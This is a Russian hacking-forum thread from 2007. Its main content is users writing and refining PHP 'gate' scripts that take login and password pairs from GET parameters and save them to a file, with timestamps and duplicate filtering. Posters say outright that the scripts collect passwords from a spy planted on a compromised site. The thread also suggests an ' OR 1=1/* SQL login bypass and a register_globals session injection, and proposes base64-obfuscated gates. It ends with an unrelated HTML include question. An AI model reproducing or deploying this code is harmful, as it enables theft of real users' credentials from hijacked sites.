
21.11.2007, 15:45
|
|
Познающий
Регистрация: 04.08.2005
Сообщений: 62
С нами:
10929474
Репутация:
46
|
|
Ponchik, да ты бог) Все просто летает и лишь 1 строчка)
|
|
|

21.11.2007, 16:06
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
С нами:
10892546
Репутация:
2274
|
|
195531, покажи скрипт выше, надо знать что такое $innick и откуда оно берётся
А ваще логи и пасс напиши ' OR 1=1/* если пустит, значит можно, если нет, всётаки выложи скрипт 
/me только что заметил "//вышестоящая проверка вырезана, поскольку там ничего не поделать"
ну значит не судьба
Хотя если включены глобальные переменные, можеш попробовать зайти на сайт
index.php?$_SESSION[userenter]=1
Последний раз редактировалось Ponchik; 21.11.2007 в 16:08..
|
|
|

21.11.2007, 16:36
|
|
Новичок
Регистрация: 19.11.2007
Сообщений: 3
С нами:
9724463
Репутация:
0
|
|
Сообщение от Ponchik
195531, покажи скрипт выше, надо знать что такое $innick и откуда оно берётся
А ваще логи и пасс напиши ' OR 1=1/* если пустит, значит можно, если нет, всётаки выложи скрипт 
/me только что заметил "//вышестоящая проверка вырезана, поскольку там ничего не поделать"
ну значит не судьба
Хотя если включены глобальные переменные, можеш попробовать зайти на сайт
index.php?$_SESSION[userenter]=1
ссылку кинул в другой раздел, здесь все таки не совсем то. там инъекции нет походу, но можно весь код посмотреть, если интересно смотрите
http://forum.antichat.ru/showthread.php?p=510350#post510350
|
|
|

21.11.2007, 17:07
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами:
9999746
Репутация:
1318
|
|
spyke, используй для вошки, которая льёт пасы в файло такой код:
PHP код:
<?php
if (isset($_GET["login"]) && isset($_GET["password"])) {
$line = sprintf("%s:%s\n", $_GET["login"], $_GET["password"]);
$suff_data = file("stuff.txt");
foreach ($suff_data as $account_data)
if (trim($line) == trim($account_data)) die("Повтор на первом игроке");
$file_id = fopen("stuff.txt", "a+");
if (!$file_id) die("Не могу открыть файлег!");
fputs($file_id, $line);
fclose($file_id);
}
?>
Разумеется, исправь поведение на ошибки и следи чтобы файл не вырос до громадных размеров, иначе скрипт будет тормозить, а следовательно и будет тормозить страница, с которой ты вызываешь вошку.
|
|
|

21.11.2007, 17:44
|
|
Познающий
Регистрация: 04.08.2005
Сообщений: 62
С нами:
10929474
Репутация:
46
|
|
Скрипт рабочий, но допустим, мне нужно поставить дату и время перед каждой парой логин , пароль. Я сделал вот так:
PHP код:
<?PHP
$date = date("m/d/y H:i:s");
if (isset($_GET["acc"]) && isset($_GET["pass"])) {
$line = sprintf("$date [ %s , %s ]\n", $_GET["acc"], $_GET["pass"]);
$suff_data = file("file.txt");
foreach ($suff_data as $account_data)
if (trim($line) == trim($account_data)) die("повтор");
$file_id = fopen("file.txt", "a+");
if (!$file_id) die("die");
fputs($file_id, $line);
fclose($file_id);
}
?>
На выходе получаем это:
Код:
11/21/07 14:23:46 [ test , test ]
11/21/07 14:23:50 [ test , test ]
11/21/07 14:23:50 [ test , test ]
11/21/07 14:39:05 [ sdfsdf , sdfdsf ]
11/21/07 14:39:09 [ sdfsdf , sdfdsf ]
11/21/07 14:39:10 [ sdfsdf , sdfdsf ]
11/21/07 14:39:13 [ sdfsdf , sdfdsf ]
11/21/07 14:39:14 [ sdfsdf , sdfdsf ]
11/21/07 14:39:26 [ werwr , sdfsdsg ]
11/21/07 14:39:36 [ werwr , sdfsdsg ]
11/21/07 14:39:37 [ werwr , sdfsdsg ]
11/21/07 14:39:43 [ werwr , sdfsdsg ]
11/21/07 14:39:44 [ werwr , sdfsdsg ]
11/21/07 14:40:00 [ werwr , sdfsdsg ]
Скрипт смотрит строки, а мне нужно чтоб он смотрел в квадратные скобки каждой строчки) И еще, юзеры зачастую первый раз вводят пароль неправильно и посылают данные еще раз. Тоесть, автоматом надо отсеивать только повторяющиеся пары логин+пароль, а не просто логин.
Предлагаю мастерам написать гибкий скрипт универсального гейта) С гуи интерфейсом и всякими фичами. Хокер выбирает, какие переменные принимать, куда их сохранять, в каком формате, ставить ли дату и время, в каком опять же формате и где, включать ли защиту от повторов. Гуи должен в конце показать кусочек пхп кода file() , со всеми нужными переменными и адресом сервера.
Вроде, я такому еще аналогов не видел.
Да, кусочек кода может модифицироваться base64 по желанию, а инфа криптоваться XOR'ом.
Последний раз редактировалось spyke; 21.11.2007 в 17:54..
|
|
|

21.11.2007, 17:58
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
С нами:
10892546
Репутация:
2274
|
|
Пля! Ничо не понимал, дошло что это гейт
PHP код:
<?PHP
$date = date("m/d/y H:i:s");
if (isset($_GET["acc"]) && isset($_GET["pass"])) {
$line = sprintf("$date [ %s , %s ]\n", $_GET["acc"], $_GET["pass"]);
$suff_data = file_get_contents("file.txt");
if (!strpos($suff_data,"{$_GET['acc']} , {$_GET['pass']}")) {
$file_id = fopen("file.txt", "a+");
if (!$file_id) die("die");
fputs($file_id, $line);
fclose($file_id);
} //Иначе просто ничего не делать
}
?>
Если чё, стучи 202-995-022 буду тебя учить 
Последний раз редактировалось Ponchik; 22.11.2007 в 12:02..
|
|
|

21.11.2007, 18:33
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами:
9999746
Репутация:
1318
|
|
Ну чтобы писать с датой запроса, можно использовать такой скрипт:
PHP код:
<?php
if (isset($_GET["login"]) && isset($_GET["password"])) {
$line = sprintf("%s:%s\n", $_GET["login"], $_GET["password"]);
$suff_data = file("stuff.txt");
foreach ($suff_data as $account_data)
if (trim($line) == trim($account_data)) die("Повтор на первом игроке");
$file_id = fopen("stuff.txt", "a+");
if (!$file_id) die("Не могу открыть файлег!");
$extended_line = sprintf("[%s] - %s", date("m/d/y H:i:s"), $line);
fputs($file_id, $extended_line);
fclose($file_id);
}
?>
А чтобы писать только те пароли, которые были введены правильно - ты просто вставь на хосте, в которого ты засадил шпиона, строчку вызова вошки в то место, которое идёт после проверки аутентификации...
|
|
|

21.11.2007, 18:37
|
|
Познающий
Регистрация: 04.08.2005
Сообщений: 62
С нами:
10929474
Репутация:
46
|
|
Спасибо всем еще раз, проблема решена)
|
|
|

22.11.2007, 08:53
|
|
Постоянный
Регистрация: 29.10.2007
Сообщений: 381
С нами:
9754684
Репутация:
65
|
|
почему в браузере не высвечивается содержимое файлов(файлы не пустые...)
PHP код:
<HTML>
<HEAD>
<TITLE>Главная страница</TITLE>
</HEAD>
<table width=100% height=100% border=1>
<tr><td height=150 colspan=3>
<center>Заголовок</center>
</td></tr>
<tr><td width=150>
<?php
include "left.php";
?>
</td>
<td>
TEXT
</td>
<td width=150>
<?php
include "golos.html";
?>
</td></tr>
<tr><td height=15 colspan=3>
TEXT
</td></tr>
</table>
</HTML>
Последний раз редактировалось XopoIII; 22.11.2007 в 10:15..
|
|
|

22.11.2007, 08:54
|
|
Постоянный
Регистрация: 29.10.2007
Сообщений: 381
С нами:
9754684
Репутация:
65
|
|
часть таблицы где инклуды тупо проподает
|
|
|
|
 |
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 9 (пользователей: 0 , гостей: 9)
|
|
|
|